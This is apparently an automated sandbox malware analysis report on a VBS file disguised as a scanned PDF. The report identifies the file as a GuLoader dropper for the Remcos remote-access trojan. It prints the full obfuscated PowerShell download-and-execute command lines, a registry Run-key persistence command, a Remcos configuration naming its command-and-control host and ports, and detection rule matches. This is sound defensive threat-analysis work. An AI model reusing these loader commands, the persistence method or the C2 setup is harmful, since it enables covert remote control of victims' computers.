Windows Analysis Report
Scanned_22C-6e24090516030.pdf.vbs

Overview

General Information

Sample name: Scanned_22C-6e24090516030.pdf.vbs
Analysis ID: 1538696
MD5: 1c78cc71bf8db131a33f156feff9ec4d
SHA1: af06e517411ac017868488d8a7173bb2d5d98012
SHA256: e4c5f96a9fbb32b0754fba2c4bd4a3773a77d8018b7aa5d572b067777de7165b
Tags: vbs user-abuse_ch

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7784 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7912 cmdline: ping gormezl_6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. 
DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali. onowB ufeGelaBMorbCT,anlmod I H feBossnSwe.tAvec ');Phonogramically ($Discriminatingness);Phonogramically (Tuggery ' nob$RattGPal rCapru dgnSubndBefjlMascn SjlsDi,e.afb,H,apseTilpa Unid,mageSforrGonosnach[ luo$Ch.cbM norSt,no WagkFirebPiloiIndhnExcedTampsTeat]Ato = Pas$RaceF Ry iTvedn udbaSi.ilA,oniCoexs Ve m emieTilrn ScusGumw ');$Fredric=Tuggery ' Mol$ PopG AutrU ysuSeycnFor d ElwlYppenLi rsGarv. 
DopDTrouo GrewAurin SoflH ltoTricanonsdS ntFStreiMul,lIngee ef(tonj$TinnHMarke ellmStataBiogtObstoFirmzTempoUnstaElemnKrae, ak,$TubuSPolie iffl Kalv FlosG ankRehey atelAnthd infnDelme IndrShorkToupafrimuGamatKon ivedto AshnHelleMidtr F lnAlame.jrgs G n)P,eu ';$Selvskyldnerkautionernes=$Diskspecifikationers248;Phonogramically (Tuggery ' Eng$MenuGCardl horOOverB TriAStamlKonn: teu torn L,nGChokkGlutaReserAds,LFje,E.vinLT leE OrdJSkylL usIHypeG oyeH AdeE minDA,onECo lN Da =Card(T net AmiERabiSSekutPse,-EksppUnalaSenntOverHAlbu Agen$ potsLierEStudL,uldv rilSVerekDentYLab,L Besd,ilinHulleskraRautokUnp AMachUP toTReuniOlymO Fr nGregEAc,yRStraNe teePan.S P,e)Synk ');while (!$Ungkarlelejligheden) {Phonogramically (Tuggery 'Trn $Cathg DatlgradoRuinb MotaGranl Str: onrFEmeriBenelHkliiTabtcMergian rf kaeoAborrFronm.pil2Skil2Ste.6Pant=Disg$StortpicarFiskuBrigeUlve ') ;Phonogramically $Fredric;Phonogramically (Tuggery 'Brt sSupeTStomaTrutr coaTSlid- GurSTyrol MulE Ti E BehPEksa Rab4Bedr ');Phonogramically (Tuggery 'Opbl$ UddG FusL Malo EncbF siA.ulgL M,n:S.aluNonsN Tm,g Cirk iffaVikirSnerL AtoeSky LFacteKohsJDe tLLderiAmelg FifHNonaEJuibd UtiE BosNStra=Tele(PaviTFoxhE alsSluttDa,g-StedP W oaMacmTSid h ri J rg$Spr s ammE F llAcriVB.igsSekrKUnpeY ElilPos D TypNKaleeP ycrArboKSl,mAF,rvUGhast Su IK geOUd.inRendESimorUbruN Pr.EphosS Lik)Mobn ') ;Phonogramically (Tuggery ' eng$DybdgIncul LanoUlovBMadoATa aLK nt:RingISpydnSalgd ramsN,ury HanLSubtTUranEStu.D alveVolu=Vers$AagegSociLSkaroImpaBPligaS.ydlSkib:BeliU banTr uD.andeBrokr ,onDStraiFe,lDKurs+Sacc+ad e%anfg$MenuBSkibRafleu SkrGRig eSa,srOutcSIagtE MezrMeteVSc oIRenpC egnERuss. ThecInstOArb Uaustn BasTapol ') ;$Hematozoan=$Brugerservice[$Indsyltede];}$Banquette=344282;$Gynobasic=30458;Phonogramically (Tuggery 'he e$ Sl G LdiLAlbuoGadiBIgnoA lyklSkld: RefQStudUMithiExtrNF rkIOpprrNon eHysttUf ri artnAph. 
mag = ami AmbiGMuspEUn aT.hor- modcLavtO eonNanstAngaeCowsnForttTint ich$Glats fsteKariLfri v pprSUn,ok SkoyTlinLmu.dDMe lnGausePolyrHemokShilAFamiUSoc t De,iM.cro msNBl dE Firr OutN alleSu,tsScul ');Phonogramically (Tuggery 'Kvar$EntegCeralStreoMesobGangaSemilPeng:AnsoSDuotkGs iiKlaslInspt P reglersM sekB.dwrKildiForhfMe itOvereOvernSkl Jagg=Styr Scop[BrneSUdviyR mbsArtitForueZ ppmEhle.A noC Cl,oKo pnCutwvBeboeLophr upt cro]Bell:Buks:PervFTh,orGrooo andm etrBNonpa .unsf,bre,fta6 Hus4HektSPreftNonerEftei Fugn,arlg Mik(Cha $femtQout uOveriE osnHapli Ferr onoeMiljtMe oiOpernMyco).icr ');Phonogramically (Tuggery 'Busk$FladgjasmlAv so D nB BroaPreclGa,e:PersCK naY .iscPol l aneIPurpz He EOverSUnse Upg= rak Bags[OutlsUngly LsrsReprTJam e o tMInt,.sygeTDecre Sn XBlodtS bt.overE CivnNeurcForvOSickd ,oniEvapNRejsgCypt]Nymp:Deva: TroA Clissta,CDemoI BaciBor,.SnudGOrdae RektraadsunhaT DoxrEfteIOms NMakag Sug(Anon$S spsPsykKensoiMutilForhtSolaeUrinS NonKStoprSk ai ,akFChiltObseeUnexnIdrt),ons ');Phonogramically (Tuggery ' No.$SnydgAnchLHarao AlyBOrdrA Facl Syg:KintsEss.lAnnogMealtNatus ernfT agEHamaj rakDRe.rENedvnFrui1Udsk1 Ca 4 nde=Kugl$ConsC cheyRes CMultLSl gIIntezSko,EPhorSMave.CarisInjuU.ranBGangSFa atMe aRTranI esonG,niG Op,(U fr$ .albThoraSprnNDefeQ Hn UAtone ott SmaTKl vESafi,kuri$BarigSortYYa,gnLowloAvisbMonoASammsO erIOverc lok)Fors ');Phonogramically $Slgtsfejden114;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7216 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. 
DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali. onowB ufeGelaBMorbCT,anlmod I H feBossnSwe.tAvec ');Phonogramically ($Discriminatingness);Phonogramically (Tuggery ' nob$RattGPal rCapru dgnSubndBefjlMascn SjlsDi,e.afb,H,apseTilpa Unid,mageSforrGonosnach[ luo$Ch.cbM norSt,no WagkFirebPiloiIndhnExcedTampsTeat]Ato = Pas$RaceF Ry iTvedn udbaSi.ilA,oniCoexs Ve m emieTilrn ScusGumw ');$Fredric=Tuggery ' Mol$ PopG AutrU ysuSeycnFor d ElwlYppenLi rsGarv. 
DopDTrouo GrewAurin SoflH ltoTricanonsdS ntFStreiMul,lIngee ef(tonj$TinnHMarke ellmStataBiogtObstoFirmzTempoUnstaElemnKrae, ak,$TubuSPolie iffl Kalv FlosG ankRehey atelAnthd infnDelme IndrShorkToupafrimuGamatKon ivedto AshnHelleMidtr F lnAlame.jrgs G n)P,eu ';$Selvskyldnerkautionernes=$Diskspecifikationers248;Phonogramically (Tuggery ' Eng$MenuGCardl horOOverB TriAStamlKonn: teu torn L,nGChokkGlutaReserAds,LFje,E.vinLT leE OrdJSkylL usIHypeG oyeH AdeE minDA,onECo lN Da =Card(T net AmiERabiSSekutPse,-EksppUnalaSenntOverHAlbu Agen$ potsLierEStudL,uldv rilSVerekDentYLab,L Besd,ilinHulleskraRautokUnp AMachUP toTReuniOlymO Fr nGregEAc,yRStraNe teePan.S P,e)Synk ');while (!$Ungkarlelejligheden) {Phonogramically (Tuggery 'Trn $Cathg DatlgradoRuinb MotaGranl Str: onrFEmeriBenelHkliiTabtcMergian rf kaeoAborrFronm.pil2Skil2Ste.6Pant=Disg$StortpicarFiskuBrigeUlve ') ;Phonogramically $Fredric;Phonogramically (Tuggery 'Brt sSupeTStomaTrutr coaTSlid- GurSTyrol MulE Ti E BehPEksa Rab4Bedr ');Phonogramically (Tuggery 'Opbl$ UddG FusL Malo EncbF siA.ulgL M,n:S.aluNonsN Tm,g Cirk iffaVikirSnerL AtoeSky LFacteKohsJDe tLLderiAmelg FifHNonaEJuibd UtiE BosNStra=Tele(PaviTFoxhE alsSluttDa,g-StedP W oaMacmTSid h ri J rg$Spr s ammE F llAcriVB.igsSekrKUnpeY ElilPos D TypNKaleeP ycrArboKSl,mAF,rvUGhast Su IK geOUd.inRendESimorUbruN Pr.EphosS Lik)Mobn ') ;Phonogramically (Tuggery ' eng$DybdgIncul LanoUlovBMadoATa aLK nt:RingISpydnSalgd ramsN,ury HanLSubtTUranEStu.D alveVolu=Vers$AagegSociLSkaroImpaBPligaS.ydlSkib:BeliU banTr uD.andeBrokr ,onDStraiFe,lDKurs+Sacc+ad e%anfg$MenuBSkibRafleu SkrGRig eSa,srOutcSIagtE MezrMeteVSc oIRenpC egnERuss. ThecInstOArb Uaustn BasTapol ') ;$Hematozoan=$Brugerservice[$Indsyltede];}$Banquette=344282;$Gynobasic=30458;Phonogramically (Tuggery 'he e$ Sl G LdiLAlbuoGadiBIgnoA lyklSkld: RefQStudUMithiExtrNF rkIOpprrNon eHysttUf ri artnAph. 
mag = ami AmbiGMuspEUn aT.hor- modcLavtO eonNanstAngaeCowsnForttTint ich$Glats fsteKariLfri v pprSUn,ok SkoyTlinLmu.dDMe lnGausePolyrHemokShilAFamiUSoc t De,iM.cro msNBl dE Firr OutN alleSu,tsScul ');Phonogramically (Tuggery 'Kvar$EntegCeralStreoMesobGangaSemilPeng:AnsoSDuotkGs iiKlaslInspt P reglersM sekB.dwrKildiForhfMe itOvereOvernSkl Jagg=Styr Scop[BrneSUdviyR mbsArtitForueZ ppmEhle.A noC Cl,oKo pnCutwvBeboeLophr upt cro]Bell:Buks:PervFTh,orGrooo andm etrBNonpa .unsf,bre,fta6 Hus4HektSPreftNonerEftei Fugn,arlg Mik(Cha $femtQout uOveriE osnHapli Ferr onoeMiljtMe oiOpernMyco).icr ');Phonogramically (Tuggery 'Busk$FladgjasmlAv so D nB BroaPreclGa,e:PersCK naY .iscPol l aneIPurpz He EOverSUnse Upg= rak Bags[OutlsUngly LsrsReprTJam e o tMInt,.sygeTDecre Sn XBlodtS bt.overE CivnNeurcForvOSickd ,oniEvapNRejsgCypt]Nymp:Deva: TroA Clissta,CDemoI BaciBor,.SnudGOrdae RektraadsunhaT DoxrEfteIOms NMakag Sug(Anon$S spsPsykKensoiMutilForhtSolaeUrinS NonKStoprSk ai ,akFChiltObseeUnexnIdrt),ons ');Phonogramically (Tuggery ' No.$SnydgAnchLHarao AlyBOrdrA Facl Syg:KintsEss.lAnnogMealtNatus ernfT agEHamaj rakDRe.rENedvnFrui1Udsk1 Ca 4 nde=Kugl$ConsC cheyRes CMultLSl gIIntezSko,EPhorSMave.CarisInjuU.ranBGangSFa atMe aRTranI esonG,niG Op,(U fr$ .albThoraSprnNDefeQ Hn UAtone ott SmaTKl vESafi,kuri$BarigSortYYa,gnLowloAvisbMonoASammsO erIOverc lok)Fors ');Phonogramically $Slgtsfejden114;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7092 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 7044 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 6596 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["blackass.duckdns.org:65253:1", "blackass.duckdns.org:53241:1"], "Assigned name": "Rm", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-K8KWVT", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
00000009.00000002.2629630958.0000000009B0E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000009.00000003.1938941786.0000000009B41000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000009.00000002.2629630958.0000000009B41000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000006.00000002.1737463772.0000000008E20000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
00000009.00000002.2629630958.0000000009AAA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings
amsi64_7972.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi32_7216.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | matched strings:
  • 0xc623:$b2: ::FromBase64String(
  • 0xb67c:$s1: -join
  • 0x4e28:$s4: +=
  • 0x4eea:$s4: +=
  • 0x9111:$s4: +=
  • 0xb22e:$s4: +=
  • 0xb518:$s4: +=
  • 0xb65e:$s4: +=
  • 0x1572c:$s4: +=
  • 0x157ac:$s4: +=
  • 0x15872:$s4: +=
  • 0x158f2:$s4: +=
  • 0x15ac8:$s4: +=
  • 0x15b4c:$s4: +=
  • 0xbeb7:$e4: Get-WmiObject
  • 0xc0a6:$e4: Get-Process
  • 0xc0fe:$e4: Start-Process
  • 0x163dc:$e4: Get-Process

              System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned_22C-6e24090516030.pdf.vbs", ProcessId: 7784, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: %Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community; Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7044, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)", ProcessId: 6596, ProcessName: reg.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 199.103.62.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7092, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 49973
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7092, ParentProcessName: 